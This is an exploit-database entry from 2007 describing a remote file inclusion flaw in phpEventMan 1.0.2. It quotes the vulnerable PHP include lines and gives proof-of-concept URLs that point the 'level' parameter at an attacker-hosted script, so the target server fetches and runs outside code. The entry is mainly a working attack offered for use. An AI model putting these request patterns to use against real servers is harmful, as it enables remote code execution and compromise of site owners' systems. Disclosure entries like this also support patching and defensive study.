phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities
# Published : 2007-02-01
# Author : xoron
# Previous Title : SIPS <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
# Next Title : WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability

-----------------------------------------------

phpEventMan v1.0.2 (level) Remote File Include Exploit

-----------------------------------------------

Author: Cyber-Security

cyber-security.org

-----------------------------------------------

Code:

include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");

-----------------------------------------------

POC:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594

# www.Syue.com [2007-02-01]